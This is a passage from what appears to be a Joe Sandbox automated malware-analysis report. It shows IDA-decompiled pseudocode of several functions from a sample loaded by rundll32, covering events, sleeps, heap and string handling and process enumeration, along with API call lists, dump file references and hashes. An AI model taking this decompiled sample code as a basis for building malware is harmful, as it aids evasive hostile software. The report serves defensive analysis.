				if(_v16 != 0) {
					E047B568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E047B72F2( &_v32, _t39);
					goto L13;
				}
			}












                                          0x047b54ac
                                          0x047b54b9
                                          0x047b54bf
                                          0x047b54c0
                                          0x047b54c1
                                          0x047b54c2
                                          0x047b54c3
                                          0x047b54c7
                                          0x047b54d3
                                          0x047b54d7
                                          0x047b555f
                                          0x047b555f
                                          0x047b5562
                                          0x047b5564
                                          0x047b556c
                                          0x047b5572
                                          0x047b5575
                                          0x047b5575
                                          0x047b5572
                                          0x047b5580
                                          0x047b5580
                                          0x047b54ea
                                          0x047b54ec
                                          0x047b54ec
                                          0x047b5503
                                          0x047b5507
                                          0x047b550a
                                          0x047b5515
                                          0x047b551c
                                          0x047b551c
                                          0x047b5525
                                          0x047b5529
                                          0x047b5537
                                          0x047b552b
                                          0x047b552b
                                          0x047b552c
                                          0x047b552d
                                          0x047b552e
                                          0x047b552f
                                          0x047b5530
                                          0x047b5530
                                          0x047b553c
                                          0x047b553f
                                          0x047b5543
                                          0x047b5545
                                          0x047b5545
                                          0x047b554c
                                          0x00000000
                                          0x047b554e
                                          0x047b554e
                                          0x047b555b
                                          0x00000000
                                          0x047b555b

                                          APIs
                                          • CreateEventA.KERNEL32(047BD2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 047B54FD
                                          • SetEvent.KERNEL32(00000000), ref: 047B550A
                                          • Sleep.KERNEL32(00000BB8), ref: 047B5515
                                          • CloseHandle.KERNEL32(00000000), ref: 047B551C
                                            • Part of subcall function 047B9575: WaitForSingleObject.KERNEL32(00000000,?,?,?,047B553C,?,047B553C,?,?,?,?,?,047B553C,?), ref: 047B964F
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 7bbda241f8dd99541bc10c84eed32fa3707901401ad644d1bc87349eed14f3ff
                                          • Instruction ID: 10ef377cb368f8a52d29b437b491f26e3adac498905ddc1a99493160caa83408
                                          • Opcode Fuzzy Hash: 7bbda241f8dd99541bc10c84eed32fa3707901401ad644d1bc87349eed14f3ff
                                          • Instruction Fuzzy Hash: D7212472D00119BBDB10AFE5D888BDE777BEF44359B05C425EA92B7200D674BA418BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B1295, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E047B1295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E047B58BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x047b12a1
                                          0x047b12a5
                                          0x047b12a6
                                          0x047b12a7
                                          0x047b12a9
                                          0x047b12ab
                                          0x047b12ae
                                          0x047b12b3
                                          0x047b134a
                                          0x047b1351
                                          0x047b1351
                                          0x047b12bc
                                          0x047b12c3
                                          0x047b12d3
                                          0x047b12d3
                                          0x047b12d9
                                          0x047b12db
                                          0x047b12e0
                                          0x047b12e9
                                          0x047b12ef
                                          0x047b12f4
                                          0x047b12ff
                                          0x047b1303
                                          0x047b1305
                                          0x047b1306
                                          0x047b130f
                                          0x047b1313
                                          0x047b1324
                                          0x047b1315
                                          0x047b131a
                                          0x047b131f
                                          0x047b132e
                                          0x047b132e
                                          0x047b1303
                                          0x047b1334
                                          0x047b133a
                                          0x047b133a
                                          0x047b1343
                                          0x047b1348
                                          0x047b1348
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 3a859eba638ccf9270f1fe223ddcaca21ff1ba17e15a1c83d8f4c8996773a53d
                                          • Instruction ID: 4bc1a9663db5464068384c5a2173ca8e9e3e4defd5e5210590eec770521bf8dc
                                          • Opcode Fuzzy Hash: 3a859eba638ccf9270f1fe223ddcaca21ff1ba17e15a1c83d8f4c8996773a53d
                                          • Instruction Fuzzy Hash: B2214175901609EFDB11DFA4D998EDEBBB8FF48344B5085A9E981E7300E730EA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B4858, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E047B4858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x47bd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x47bd250; // 0xbcde7f96
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x47bd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x047b4860
                                          0x047b4863
                                          0x047b4869
                                          0x047b4881
                                          0x047b4883
                                          0x047b4888
                                          0x047b488a
                                          0x047b488d
                                          0x047b488f
                                          0x047b4892
                                          0x047b4894
                                          0x047b4894
                                          0x047b4896
                                          0x047b48a1
                                          0x047b48a6
                                          0x047b48b7
                                          0x047b48bf
                                          0x047b48c4
                                          0x047b48c7
                                          0x047b48ca
                                          0x047b48cc
                                          0x047b48cf
                                          0x047b48d2
                                          0x047b48d2
                                          0x047b48d5
                                          0x047b48e0
                                          0x047b48e5
                                          0x047b48ef

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047B4DBF,00000000,?,?,047B52FE,?,06CB95B0), ref: 047B4863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047B487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,047B4DBF,00000000,?,?,047B52FE,?,06CB95B0), ref: 047B48BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 047B48E0
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 1ac5fa6890403896dc3c6c13b597d54f97da063170deee5ff955a6ed865c2fc6
                                          • Instruction ID: 8fc0b52b40c43a9a9c500524adb0676c0758eae8f79fdfbdd31343c5460c5bd4
                                          • Opcode Fuzzy Hash: 1ac5fa6890403896dc3c6c13b597d54f97da063170deee5ff955a6ed865c2fc6
                                          • Instruction Fuzzy Hash: 8911C2B2A00158AFD715CE69DD88EDEBBEEEBD4260B05417AF5449B241E774AE00C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B6AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E047B6AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E047B6F89(_t8, _t1);
				_t16 = E047B58BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E047B9038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E047B58BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E047B147E(_t16);
				}
				return _t18;
			}









                                          0x047b6b02
                                          0x047b6b03
                                          0x047b6b06
                                          0x047b6b08
                                          0x047b6b13
                                          0x047b6b17
                                          0x047b6b1c
                                          0x047b6b20
                                          0x047b6b28
                                          0x047b6b2d
                                          0x047b6b35
                                          0x047b6b35
                                          0x047b6b3e
                                          0x047b6b42
                                          0x047b6b48
                                          0x047b6b4b
                                          0x047b6b51
                                          0x047b6b51
                                          0x047b6b59
                                          0x047b6b59
                                          0x047b6b60
                                          0x047b6b60
                                          0x047b6b6b

                                          APIs
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                            • Part of subcall function 047B9038: wsprintfA.USER32 ref: 047B9094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,047B2098,74666F53,00000000,?,047BD00C,?,?), ref: 047B6B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047B6B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047B6B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: d0e716f1d065d68d3fcd218014ad7e7e5bca5407a5fd3fc3b7ab71b4f88e874f
                                          • Instruction ID: 36047ccb1dd073c5f3ac272780669df9cf93aeedf6d5d0a17991d82be135a518
                                          • Opcode Fuzzy Hash: d0e716f1d065d68d3fcd218014ad7e7e5bca5407a5fd3fc3b7ab71b4f88e874f
                                          • Instruction Fuzzy Hash: 6601A272100505BBDB122BA89C88FEF7B7CDF84389F148425FB8456204DB39994587E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B56A2, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E047B56A2() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x47bd2a4; // 0x24fa5a8
						_t2 = _t9 + 0x47bee38; // 0x73617661
						_push( &_v264);
						if( *0x47bd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                          0x047b56ad
                                          0x047b56b7
                                          0x047b56bb
                                          0x047b56c5
                                          0x047b56f6
                                          0x047b56cc
                                          0x047b56d1
                                          0x047b56de
                                          0x047b56e7
                                          0x047b56fe
                                          0x047b56e9
                                          0x047b56f1
                                          0x00000000
                                          0x047b56f1
                                          0x047b56ff
                                          0x047b5700
                                          0x00000000
                                          0x047b5700
                                          0x00000000
                                          0x047b56fa
                                          0x047b5706
                                          0x047b570b

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047B56B2
                                          • Process32First.KERNEL32(00000000,?), ref: 047B56C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 047B56F1
                                          • CloseHandle.KERNEL32(00000000), ref: 047B5700
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 02b569a30ea6cc6d17c8534ca0d786f898890763e7c848ac0f6dc39d62e4e3fe
                                          • Instruction ID: 8cd6060e795fe0ca68caedbfabcbfb374b4bdae226ea8c77552c2a720d0be787
                                          • Opcode Fuzzy Hash: 02b569a30ea6cc6d17c8534ca0d786f898890763e7c848ac0f6dc39d62e4e3fe
                                          • Instruction Fuzzy Hash: 15F0BB726011657AF720B6769C48FDB77ACDBC575CF004061ED85C3240F634E94786E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B7283, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E047B7283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x047b728d
                                          0x047b7291
                                          0x047b72a6
                                          0x047b72a8
                                          0x047b72ad
                                          0x047b72b3
                                          0x047b72b5
                                          0x047b72ba
                                          0x047b72c5
                                          0x047b72bc
                                          0x047b72bc
                                          0x047b72bc
                                          0x047b72ba
                                          0x047b72d3

                                          APIs
                                          • memset.NTDLL ref: 047B7291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 047B72A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 047B72B3
                                          • CloseHandle.KERNEL32(?), ref: 047B72C5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 462f6e98bab6f96edb39eb1e4763b0039b4163d730935a05c60ebe1b3cce1063
                                          • Instruction ID: 356292ba3eb5e7da33cd6d07ad90b0441d92b7dfe5f1f862faff3fb25802febe
                                          • Opcode Fuzzy Hash: 462f6e98bab6f96edb39eb1e4763b0039b4163d730935a05c60ebe1b3cce1063
                                          • Instruction Fuzzy Hash: 17F05EB1204708BFD310AF76DCC4DA7BBBCEB91298B118D2EF18282201D676A8044AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047BA2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E047BA2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E047B58BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                          0x047ba2f2
                                          0x047ba2f6
                                          0x047ba2f8
                                          0x047ba2fe
                                          0x047ba302
                                          0x047ba304
                                          0x047ba304
                                          0x047ba306
                                          0x047ba30f
                                          0x047ba313
                                          0x047ba31b
                                          0x047ba32a
                                          0x047ba32f
                                          0x047ba337

                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,047B9AA8,00000000,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 047BA2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047BA31B
                                          • memset.NTDLL ref: 047BA32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 4a4ea6cb632d303d826fdee8b732edec129927003f282dfd54d6684573749bfd
                                          • Instruction ID: 8666897359219c4ff775f6efc2583d6378e09b0f3aac53605b9a25a2f1256c92
                                          • Opcode Fuzzy Hash: 4a4ea6cb632d303d826fdee8b732edec129927003f282dfd54d6684573749bfd
                                          • Instruction Fuzzy Hash: 39E0A073A053116BD630A9A85C8CF8F2A9DDBC8254B004825F98587304E630DC0482E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B4C3A, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E047B4C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x47bd324; // 0x6cb95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x47bd324; // 0x6cb95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x47bd030) {
					HeapFree( *0x47bd238, 0, _t8);
				}
				_t14[1] = E047B7C75(_v0, _t14);
				_t11 =  *0x47bd324; // 0x6cb95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                          0x047b4c3a
                                          0x047b4c3a
                                          0x047b4c43
                                          0x047b4c53
                                          0x047b4c53
                                          0x047b4c58
                                          0x047b4c5d
                                          0x00000000
                                          0x00000000
                                          0x047b4c4d
                                          0x047b4c4d
                                          0x047b4c5f
                                          0x047b4c63
                                          0x047b4c75
                                          0x047b4c75
                                          0x047b4c85
                                          0x047b4c88
                                          0x047b4c8d
                                          0x047b4c91
                                          0x047b4c97

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06CB9570), ref: 047B4C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047B4C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047B4C75
                                          • RtlLeaveCriticalSection.NTDLL(06CB9570), ref: 047B4C91
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 24316fd9d468a4530d531e042e37c98dbc897ebcd206ba496f4f9f51df5bd32a
                                          • Instruction ID: 88c7aab53812a94b3033b134c8f9fe2acb4a17a25a9878ff0bd7063397392677
                                          • Opcode Fuzzy Hash: 24316fd9d468a4530d531e042e37c98dbc897ebcd206ba496f4f9f51df5bd32a
                                          • Instruction Fuzzy Hash: F8F0DA706006419FE7269F68EA48FD577E8EB14744B04C918F582D7352E728EC44CAA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B78AD, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E047B78AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x47bd26c; // 0x410
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x47bd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x47bd26c; // 0x410
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x47bd238; // 0x68c0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x047b78ad
                                          0x047b78b4
                                          0x047b78fe
                                          0x047b7900
                                          0x047b7900
                                          0x047b78b8
                                          0x047b78be
                                          0x047b78c3
                                          0x047b78c7
                                          0x047b78cd
                                          0x047b78d4
                                          0x00000000
                                          0x00000000
                                          0x047b78d6
                                          0x047b78db
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047b78db
                                          0x047b78dd
                                          0x047b78e5
                                          0x047b78e8
                                          0x047b78e8
                                          0x047b78ee
                                          0x047b78f5
                                          0x047b78f8
                                          0x047b78f8
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(00000410,00000001,047B6F2D), ref: 047B78B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 047B78C7
                                          • CloseHandle.KERNEL32(00000410), ref: 047B78E8
                                          • HeapDestroy.KERNEL32(068C0000), ref: 047B78F8
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: a79353aa837b86ddc795be6c39672ad92ac1ff6ca3f3b6c145ab928490129673
                                          • Instruction ID: aa2bfe3ee4e3baffa478a82fb132bc6561cd1f667bb5a31b88add72ca5d4202c
                                          • Opcode Fuzzy Hash: a79353aa837b86ddc795be6c39672ad92ac1ff6ca3f3b6c145ab928490129673
                                          • Instruction Fuzzy Hash: 73F0A031B053019FE7245A759E48FC23BA9EB04760704C924BC80DB380CB38EC00D6F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B9B10, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E047B9B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x47bd324; // 0x6cb95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x47bd324; // 0x6cb95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x47bd324; // 0x6cb95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x47be845) {
					HeapFree( *0x47bd238, 0, _t10);
					_t7 =  *0x47bd324; // 0x6cb95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x047b9b10
                                          0x047b9b19
                                          0x047b9b29
                                          0x047b9b29
                                          0x047b9b2e
                                          0x047b9b33
                                          0x00000000
                                          0x00000000
                                          0x047b9b23
                                          0x047b9b23
                                          0x047b9b35
                                          0x047b9b3a
                                          0x047b9b3e
                                          0x047b9b51
                                          0x047b9b57
                                          0x047b9b57
                                          0x047b9b60
                                          0x047b9b62
                                          0x047b9b66
                                          0x047b9b6c

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06CB9570), ref: 047B9B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047B9B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047B9B51
                                          • RtlLeaveCriticalSection.NTDLL(06CB9570), ref: 047B9B66
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
